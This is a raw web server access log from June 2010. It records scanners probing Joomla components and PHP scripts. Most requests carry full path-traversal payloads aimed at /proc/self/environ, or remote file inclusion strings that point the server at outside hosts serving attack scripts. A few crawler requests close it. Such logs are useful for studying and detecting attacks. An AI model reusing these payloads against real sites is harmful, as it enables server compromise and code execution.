86.109.170.175 - - [27/Jun/2010:01:58:16 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:01:58:16 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:01:58:19 -0500] "GET /logs/access_log.1274054400/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
92.240.65.137 - - [27/Jun/2010:01:58:36 -0500] "GET /logs/access_log.1276732800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
92.240.65.137 - - [27/Jun/2010:01:58:37 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
92.240.65.137 - - [27/Jun/2010:01:58:37 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.803"
92.240.65.137 - - [27/Jun/2010:01:58:43 -0500] "GET /logs/access_log.1274054400/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
64.150.180.136 - - [27/Jun/2010:01:59:02 -0500] "GET /logs/access_log.1274400000/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
64.150.180.136 - - [27/Jun/2010:01:59:03 -0500] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
64.150.180.136 - - [27/Jun/2010:01:59:03 -0500] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.810"
85.19.150.100 - - [27/Jun/2010:01:59:07 -0500] "GET /logs/access_log.1276214400/?*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
216.127.70.140 - - [27/Jun/2010:01:59:08 -0500] "GET //index.php?option=com_userstatus&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:01:59:10 -0500] "GET //index.php?option=com_userstatus&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:01:59:10 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:01:59:10 -0500] "GET /logs//index.php?option=com_userstatus&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:01:59:11 -0500] "GET /logs//index.php?option=com_userstatus&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:01:59:11 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:01:59:27 -0500] "GET //index.php?option=com_userstatus&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:01:59:27 -0500] "GET /logs//index.php?option=com_userstatus&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:01:59:28 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:01:59:28 -0500] "GET //index.php?option=com_userstatus&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:01:59:28 -0500] "GET /logs//index.php?option=com_userstatus&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:01:59:29 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:01:59:32 -0500] "GET /logs/access_log.1276041600//index.php?option=com_userstatus&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:01:59:34 -0500] "GET /logs/access_log.1276041600//index.php?option=com_userstatus&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:02:00:41 -0500] "GET /logs/access_log.1276732800/index.php?option=com_rd_download&view=download&cid=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.150.180.136 - - [27/Jun/2010:02:00:46 -0500] "GET /logs/access_log.1274400000/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
64.150.180.136 - - [27/Jun/2010:02:00:46 -0500] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
64.150.180.136 - - [27/Jun/2010:02:00:46 -0500] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.810"
86.109.170.175 - - [27/Jun/2010:02:00:54 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
200.103.187.57 - - [27/Jun/2010:02:02:47 -0500] "GET /logs/access_log.1266710400/phphtml.php?htmlclass_path=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 322 "-""libwww-perl/5.825"
200.103.187.57 - - [27/Jun/2010:02:02:48 -0500] "GET /phphtml.php?htmlclass_path=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.825"
200.103.187.57 - - [27/Jun/2010:02:02:49 -0500] "GET /logs/phphtml.php?htmlclass_path=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.825"
174.133.206.82 - - [27/Jun/2010:02:05:12 -0500] "GET /?option=com_jmsitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.825"
174.133.206.82 - - [27/Jun/2010:02:06:19 -0500] "GET /logs/access_log.1275782400/?option=com_jmsitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.825"
174.133.206.82 - - [27/Jun/2010:02:06:20 -0500] "GET /?option=com_jmsitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.825"
174.133.206.82 - - [27/Jun/2010:02:06:20 -0500] "GET /logs/?option=com_jmsitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.825"
92.240.65.137 - - [27/Jun/2010:02:07:22 -0500] "GET /logs/access_log.1274572800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
92.240.65.137 - - [27/Jun/2010:02:07:22 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
92.240.65.137 - - [27/Jun/2010:02:07:22 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.803"
174.133.206.82 - - [27/Jun/2010:02:07:29 -0500] "GET /logs/access_log.1275609600/?option=com_jmsitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.825"
212.241.251.207 - - [27/Jun/2010:02:09:25 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
212.241.251.207 - - [27/Jun/2010:02:09:26 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
212.241.251.207 - - [27/Jun/2010:02:09:26 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.803"
212.241.251.207 - - [27/Jun/2010:02:09:55 -0500] "GET /logs/access_log.1274572800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
212.241.251.207 - - [27/Jun/2010:02:09:55 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
212.241.251.207 - - [27/Jun/2010:02:09:55 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.803"
92.240.65.137 - - [27/Jun/2010:02:10:01 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
212.241.251.207 - - [27/Jun/2010:02:13:55 -0500] "GET /logs/access_log.1274572800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
62.44.82.118 - - [27/Jun/2010:02:18:22 -0500] "GET /firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
74.81.68.114 - - [27/Jun/2010:02:20:22 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
74.81.68.114 - - [27/Jun/2010:02:20:26 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
74.81.68.114 - - [27/Jun/2010:02:22:19 -0500] "GET /*.?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.805"
74.81.68.114 - - [27/Jun/2010:02:22:19 -0500] "GET /*.?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.805"
67.195.112.180 - - [27/Jun/2010:02:23:24 -0500] "GET /logs/access_log.1194480000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.241.251.207 - - [27/Jun/2010:02:24:35 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
212.241.251.207 - - [27/Jun/2010:02:24:35 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
212.241.251.207 - - [27/Jun/2010:02:24:36 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.803"
64.91.250.11 - - [27/Jun/2010:02:26:56 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.91.250.11 - - [27/Jun/2010:02:26:56 -0500] "GET /logs/access_log.1274832000%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
64.91.250.11 - - [27/Jun/2010:02:26:56 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.44.82.118 - - [27/Jun/2010:02:27:06 -0500] "GET /logs/access_log.1275782400/firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.803"
62.44.82.118 - - [27/Jun/2010:02:27:06 -0500] "GET /firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
62.44.82.118 - - [27/Jun/2010:02:27:07 -0500] "GET /logs/firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.803"
64.91.250.11 - - [27/Jun/2010:02:27:32 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
64.91.250.11 - - [27/Jun/2010:02:27:32 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.91.250.11 - - [27/Jun/2010:02:27:32 -0500] "GET /logs/access_log.1274832000%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:02:28:13 -0500] "GET /logs/access_log.1274832000%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:02:28:13 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:02:28:13 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.44.82.118 - - [27/Jun/2010:02:28:20 -0500] "GET /logs/access_log.1276128000/firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.803"
93.186.192.124 - - [27/Jun/2010:02:28:26 -0500] "GET /logs/access_log.1274832000%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:02:28:26 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:02:28:26 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.91.250.11 - - [27/Jun/2010:02:31:13 -0500] "GET /logs/access_log.1274832000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:02:32:21 -0500] "GET /index.php?option=com_abbrev&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:02:32:21 -0500] "GET /logs/index.php?option=com_abbrev&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:02:32:21 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.247.176.194 - - [27/Jun/2010:02:32:40 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:02:32:49 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:02:32:56 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.127.70.140 - - [27/Jun/2010:02:34:27 -0500] "GET /logs/index.php?option=com_abbrev&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:02:34:27 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:02:34:28 -0500] "GET /index.php?option=com_abbrev&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
212.241.251.207 - - [27/Jun/2010:02:35:01 -0500] "GET /logs/access_log.1274572800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
216.127.70.140 - - [27/Jun/2010:02:35:05 -0500] "GET /index.php?option=com_fabrik&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:02:35:06 -0500] "GET /logs/access_log.1274832000%20%20/index.php?option=com_fabrik&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:02:35:06 -0500] "GET /logs/index.php?option=com_fabrik&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:02:35:21 -0500] "GET /index.php?option=com_fabrik&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:02:35:21 -0500] "GET /logs/index.php?option=com_fabrik&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:02:35:22 -0500] "GET /logs/access_log.1274832000%20%20/index.php?option=com_fabrik&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:02:36:10 -0500] "GET /index.php?option=com_fabrik&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:02:36:10 -0500] "GET /logs/index.php?option=com_fabrik&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:02:36:10 -0500] "GET /logs/access_log.1274832000/index.php?option=com_fabrik&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:02:36:11 -0500] "GET /index.php?option=com_fabrik&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:02:36:12 -0500] "GET /logs/access_log.1274832000/index.php?option=com_fabrik&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:02:36:12 -0500] "GET /logs/index.php?option=com_fabrik&controller=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:02:38:40 -0500] "GET /logs/access_log.1274832000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:02:40:38 -0500] "GET /logs/access_log.1274832000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
200.103.187.57 - - [27/Jun/2010:02:42:49 -0500] "GET /logs/access_log.1276128000//linkadmin.php?page=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 325 "-""libwww-perl/5.825"
200.103.187.57 - - [27/Jun/2010:02:42:49 -0500] "GET //linkadmin.php?page=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.825"
200.103.187.57 - - [27/Jun/2010:02:42:50 -0500] "GET /logs//linkadmin.php?page=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 303 "-""libwww-perl/5.825"
74.81.68.114 - - [27/Jun/2010:02:46:19 -0500] "GET /logs/access_log.1274572800/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
74.81.68.114 - - [27/Jun/2010:02:46:19 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
74.81.68.114 - - [27/Jun/2010:02:46:19 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.81.68.114 - - [27/Jun/2010:02:46:42 -0500] "GET /logs/access_log.1274572800/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
74.81.68.114 - - [27/Jun/2010:02:46:42 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
74.81.68.114 - - [27/Jun/2010:02:46:42 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.46.204.236 - - [27/Jun/2010:02:47:10 -0500] "GET /logs/access_log.1255305600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.81.68.114 - - [27/Jun/2010:02:48:49 -0500] "GET /logs/access_log.1276732800/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
200.103.187.57 - - [27/Jun/2010:02:48:54 -0500] "GET /logs/access_log.1276819200//linkadmin.php?page=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 325 "-""libwww-perl/5.825"
74.81.68.114 - - [27/Jun/2010:02:49:03 -0500] "GET /logs/access_log.1276732800/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:02:53:32 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:02:53:34 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:02:53:34 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
74.81.68.114 - - [27/Jun/2010:02:55:35 -0500] "GET /logs/access_log.1274572800/*.?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.805"
74.81.68.114 - - [27/Jun/2010:02:55:35 -0500] "GET /*.?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.805"
74.81.68.114 - - [27/Jun/2010:02:55:35 -0500] "GET /logs/*.?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.805"
74.81.68.114 - - [27/Jun/2010:02:55:57 -0500] "GET /logs/access_log.1274572800/*.?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.805"
74.81.68.114 - - [27/Jun/2010:02:55:57 -0500] "GET /*.?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.805"
74.81.68.114 - - [27/Jun/2010:02:55:57 -0500] "GET /logs/*.?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.805"
212.36.64.35 - - [27/Jun/2010:02:59:07 -0500] "GET //admin/business_inc/saveserver.php?thisdir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
212.36.64.35 - - [27/Jun/2010:02:59:07 -0500] "GET //admin/business_inc/saveserver.php?thisdir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
212.36.64.35 - - [27/Jun/2010:02:59:07 -0500] "GET //admin/business_inc/saveserver.php?thisdir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
212.36.64.35 - - [27/Jun/2010:02:59:07 -0500] "GET //admin/business_inc/saveserver.php?thisdir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
74.81.68.114 - - [27/Jun/2010:03:05:08 -0500] "GET /logs/access_log.1275264000/*.?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.805"
74.81.68.114 - - [27/Jun/2010:03:05:46 -0500] "GET /logs/access_log.1275264000/*.?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.805"
184.73.32.42 - - [27/Jun/2010:03:11:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:11:04 -0500] "GET / HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:11:49 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:11:50 -0500] "GET /?N=D HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:11:56 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:11:56 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:12:01 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:12:01 -0500] "GET /?S=A HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:12:01 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:12:02 -0500] "GET /?D=A HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:12:03 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:12:03 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
